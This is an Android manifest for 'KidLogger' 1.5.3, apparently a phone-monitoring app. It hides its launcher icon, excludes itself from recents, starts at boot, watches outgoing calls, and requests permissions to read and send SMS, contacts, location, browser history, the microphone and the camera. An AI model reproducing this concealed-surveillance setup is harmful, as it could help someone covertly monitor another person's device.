<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
      package="net.kidlogger.kidlogger"
      android:versionCode="7" android:versionName="1.5.3">    	  
    <application android:icon="@drawable/icon" android:label="@string/app_name" android:name="TApplication">
        <activity 
        	android:name=".ShowLogs" android:label="@string/show_logs_title">
        </activity>
        <activity 
        	android:name=".Settings" 
        	android:label="@string/settings_title">
        </activity>
        <activity 
        	android:name=".About" 
        	android:label="@string/about_title" 
        	android:theme="@android:style/Theme.Dialog">
        </activity>
        <service 
        	android:enabled="true" 
        	android:name=".KLService">
        	<intent-filter>
            	<action android:name="net.kidlogger.kidlogger.IRemoteService" />
        	</intent-filter>
        </service>    
		<receiver android:name=".OnBootReceiver">
			<intent-filter>
        		<action android:name="android.intent.action.BOOT_COMPLETED"/>
      		</intent-filter>
		</receiver>
<activity android:name=".ShowSysLogs" android:label="@string/troubleshoot_title"></activity>
<activity android:name=".ListLogFilesControl" android:label="@string/files_list_title"></activity>


<activity android:name=".LogsTabHost" android:theme="@android:style/Theme.NoTitleBar"></activity>
<activity android:name=".AudioFilesList"></activity>
<receiver android:exported="true" android:name=".OutCallReceiver">
	<intent-filter>
    	<action android:name="android.intent.action.NEW_OUTGOING_CALL"/>
   </intent-filter>
</receiver>
<receiver android:name=".AlarmReceiver">
	<intent-filter>
    	<action android:name="net.tesline.service.SEND_DATA"/>
    </intent-filter>
</receiver>
<activity android:name=".MainActivity" android:excludeFromRecents="true" android:label="@string/app_name">
    <intent-filter>
    	<action android:name="android.intent.action.MAIN"/>
        <!-- <category android:name="android.intent.category.LAUNCHER" />  -->
   </intent-filter>
</activity>    
</application>
    <uses-sdk android:minSdkVersion="8"/>
  
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
<!--
<uses-permission android:name="android.permission.ACCESS_LOCATION"></uses-permission>
-->
<uses-permission android:name="android.permission.INTERNET" />    
<uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"></uses-permission>
<uses-permission android:name="android.permission.READ_PHONE_STATE"></uses-permission>
<uses-permission android:name="android.permission.RECEIVE_SMS"></uses-permission>
<uses-permission android:name="android.permission.READ_SMS"></uses-permission>
<uses-permission android:name="android.permission.SEND_SMS"></uses-permission>
<uses-permission android:name="android.permission.READ_CONTACTS"></uses-permission>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"></uses-permission>
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE"></uses-permission>
<uses-permission android:name="com.android.browser.permission.READ_HISTORY_BOOKMARKS"></uses-permission>
<uses-permission android:name="android.permission.GET_TASKS"></uses-permission>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"></uses-permission>
<!-- <uses-permission android:name="android.permission.CALL_PRIVILEGED"></uses-permission>
<uses-permission android:name="android.permission.CALL_PHONE"></uses-permission>
<uses-permission android:name="android.permission.MODIFY_PHONE_STATE"></uses-permission> --> 
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"></uses-permission>
<uses-permission android:name="android.permission.RECORD_AUDIO"></uses-permission>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"></uses-permission>
<uses-permission android:name="android.permission.CAMERA"></uses-permission>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"></uses-permission>
</manifest> 